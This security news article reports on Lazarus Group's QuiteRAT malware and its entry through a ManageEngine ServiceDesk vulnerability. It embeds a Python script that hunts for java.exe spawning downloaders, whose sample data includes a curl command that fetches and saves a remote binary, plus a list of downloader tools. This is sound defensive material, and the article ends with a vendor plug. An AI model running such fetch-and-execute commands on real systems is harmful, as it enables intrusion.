The Lazarus Group, a hacking collective linked to the North Korean government, has been spotted targeting internet backbone infrastructure and healthcare organizations in the U.S. and Europe. Researchers at Cisco’s Talos security team have identified new malware deployed by the group, dubbed QuiteRAT. The hackers exploit a known vulnerability in ManageEngine ServiceDesk to gain initial access to systems. Once inside, they use the Java runtime process to download and execute a binary, leading to the deployment of QuiteRAT.
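The initial-access chain above (the ServiceDesk Java runtime spawning a child that downloads and runs a binary) is a process-tree pattern defenders can hunt for. The following is an added example, not code from Talos or the article: it scans constructed process-creation records (the pipe-delimited format, paths and utility names are assumptions for illustration) and flags children of `java.exe` that look like loaders.

```python
import re

# Constructed sample process-creation events (not real telemetry), one per line:
# timestamp|parent_image|image|command_line
SAMPLE_EVENTS = """\
2023-05-10T10:01:02Z|C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c curl http://203.0.113.5/update.bin -o C:\\Users\\Public\\svc.exe
2023-05-10T10:01:05Z|C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe|C:\\Users\\Public\\svc.exe|svc.exe
2023-05-10T10:02:00Z|C:\\Windows\\explorer.exe|C:\\Program Files\\Mozilla Firefox\\firefox.exe|firefox.exe
2023-05-10T10:03:00Z|C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe|C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe|java.exe -cp lib/* com.me.Worker
"""

# Children a Java web-application runtime has little reason to spawn directly (assumed list).
SHELLS_AND_DOWNLOADERS = {"cmd.exe", "powershell.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """Parse the constructed pipe-delimited records into dicts; command line may contain '|'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, image, cmdline = line.split("|", 3)
        events.append({"ts": ts, "parent": parent, "image": image, "cmdline": cmdline})
    return events


def detect_java_spawned_loaders(events):
    """Flag java.exe children that are shells/downloaders, carry a URL on the command line,
    or are executables outside both the JRE and the Windows directory (a staged binary)."""
    hits = []
    for e in events:
        if basename(e["parent"]) != "java.exe":
            continue
        child, image = basename(e["image"]), e["image"].lower()
        jre_dir = e["parent"].rsplit("\\", 1)[0].lower()
        reasons = []
        if child in SHELLS_AND_DOWNLOADERS:
            reasons.append("shell/downloader child")
        if URL_RE.search(e["cmdline"]):
            reasons.append("url in command line")
        if child != "java.exe" and not image.startswith(jre_dir) and not image.startswith("c:\\windows\\"):
            reasons.append("executable outside JRE/system directories")
        if reasons:
            hits.append({"ts": e["ts"], "image": e["image"], "reasons": reasons})
    return hits
```

Tune the allow-list of child images to the ServiceDesk host's baseline before alerting on it; legitimate maintenance scripts may also spawn a shell from the JRE.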
What sets QuiteRAT apart is its small file size and the programming framework it is written in, Qt. At around 5 MB it is significantly smaller than Lazarus Group's previous malware, MagicRAT (18 MB), which makes it harder to detect. QuiteRAT can execute arbitrary commands on an infected machine, record basic details such as MAC and IP addresses, and remain dormant for extended periods before reactivating.
Cisco's Talos team believes QuiteRAT is an evolved form of MagicRAT, which was last updated in April 2022. The two malware families share several traits, including the ability to run arbitrary commands and the use of base64 encoding to obfuscate their strings. They also have similar functionality that lets them remain dormant for specified periods.
The Lazarus Group has been active since at least 2009 and is known for espionage and cryptocurrency theft. The emergence of QuiteRAT indicates a continued evolution in the group’s cyber capabilities, raising concerns about its potential impact on critical infrastructure and healthcare systems. As the malware was first observed in May 2023, it marks a new chapter in the Lazarus Group’s cyber activities, warranting heightened vigilance from cybersecurity experts and organizations alike.
Source: Cyber Security Connect
To mitigate potential threats, it is important to implement additional cybersecurity measures with the help of a trusted partner like INFRA www.infrascan.net, or you can try it yourself using check.website.